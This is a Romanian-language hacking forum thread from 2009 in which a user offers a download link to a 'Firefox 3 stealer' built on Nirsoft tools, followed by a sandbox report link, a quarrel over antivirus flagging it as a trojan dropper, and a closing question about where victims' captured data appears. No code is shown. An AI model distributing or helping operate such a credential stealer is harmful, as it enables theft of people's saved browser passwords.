Nytro Posted April 13, 2009 Report Posted April 13, 2009 Simple FF 3 Stealer use Nirsoft toolsDownload:http://www.netdrive.ws/165941.html Quote
OrIaX Posted April 13, 2009 Report Posted April 13, 2009 http://anubis.iseclab.org/?action=result&task_id=1cde6b20921a65d240df4960f65efc484&format=html Quote
OrIaX Posted April 29, 2009 Report Posted April 29, 2009 @Alynhoamice esti un dobitoc.ai idee ce e un stealer cum se face cu ce se mananca?de unde veniti? Quote
Alynho Posted April 29, 2009 Report Posted April 29, 2009 @Alynhoamice esti un dobitoc.ai idee ce e un stealer cum se face cu ce se mananca?de unde veniti?frate, nu ma jigni! eu am postat ceea ce a detectat Kaspersky 7!totusi, nu inteleg de ce ma faci dobitoc?! tu de ce crezi ca am facut cont pe site-ul asta? sa invat nu? in fine, nu vreau sa intru in polemica cu tine! Quote
Fitty Posted April 30, 2009 Report Posted April 30, 2009 nice tool nytro!off : te face dobitoc pt ca majoritatea de aici asta sunt. nu o lua si tu in nume de raufrate, nu ma jigni! eu am postat ceea ce a detectat Kaspersky 7!totusi, nu inteleg de ce ma faci dobitoc?! tu de ce crezi ca am facut cont pe site-ul asta? sa invat nu? bla bla bla...mai bine taci si inghite Quote
Vlachs Posted April 30, 2009 Report Posted April 30, 2009 va credeti prea destepti de va luati de el in halul asta ?@Alynho asa iti recunoaste stubul(builderul) da e posibil ca stealerul sa nu il detecteze, asa iti da si la builderul la troieni,etc Quote
Fitty Posted April 30, 2009 Report Posted April 30, 2009 eu nu m-am luat de el...i-am dat un sfat, benny! Quote
OrIaX Posted April 30, 2009 Report Posted April 30, 2009 @benny am glumit prea mult?tine-i tu in brate si o sa ai parte numai de asa ceva pe aici"mama tuturor ranitilor"@Alynho tu de ce crezi ca am facut cont pe site-ul asta? sa invat nu?nu s-a nascut nimeni invatat dar situ` se numeste Romanian Security Team nu Romanian Hacking School in fine, nu vreau sa intru in polemica cu tine!unde e polemica? Quote
Alynho Posted April 30, 2009 Report Posted April 30, 2009 Prieteni de pe site, eu nu am nimic impotriva sa mi se spuna cand gresesc! si "inghit", atat timp cat e spus pe un ton agreabil! dar sa nu ma jigneasca, ci sa spuna frumos! @OrIax, polemica e aici : @Alynhoai idee ce e un stealer cum se face cu ce se mananca?daca eu continuam sa iti raspund la intrebare, intram in polemica nu?Stiu ca nu e "Romanian Hacking School ", dar aveti aici tutoriale din care pot invata! Eu nu vreau sa hackuiesc! ci doar sa invat putin bazele si ceea cu ce se mananca! Eu nu ma "dau" hacker!Daca majoritarea sunt dobitoci, nu inseamna ca sunt si eu! nevermind...let's get over it... Multumesc pentru sustinere Benny! da, asa e, numai stubul mi-l vedea ca troian. Acum, va rog daca se poate, sa incheiem toata chestia asta! Si pe viitor daca se mai intampla asa, o sa "inghit"!Multumesc! Quote
loki Posted April 30, 2009 Report Posted April 30, 2009 hai ca sa nu continuati, putin F1:@alynho: trojan.dropper! virus ) === dai impresia ca stii prea multe de la primu post automat primesti raspunsuri de genul:@oriax: amice esti un dobitoc. === Care te-ai grabit sa sari la harta!!!Ce naiba, Gata!!! BAN amandoi!!!!.......on second thought - glumeam. Hai nu mai continuati, ii faceti varza topicul lui Nytro si vine el cu banuri de 2 ori MAI tinere. Quote
eXcEssz0r Posted July 5, 2009 Report Posted July 5, 2009 Nytro , si daca il deschide cineva , eu unde ii vad datele victimei ? Quote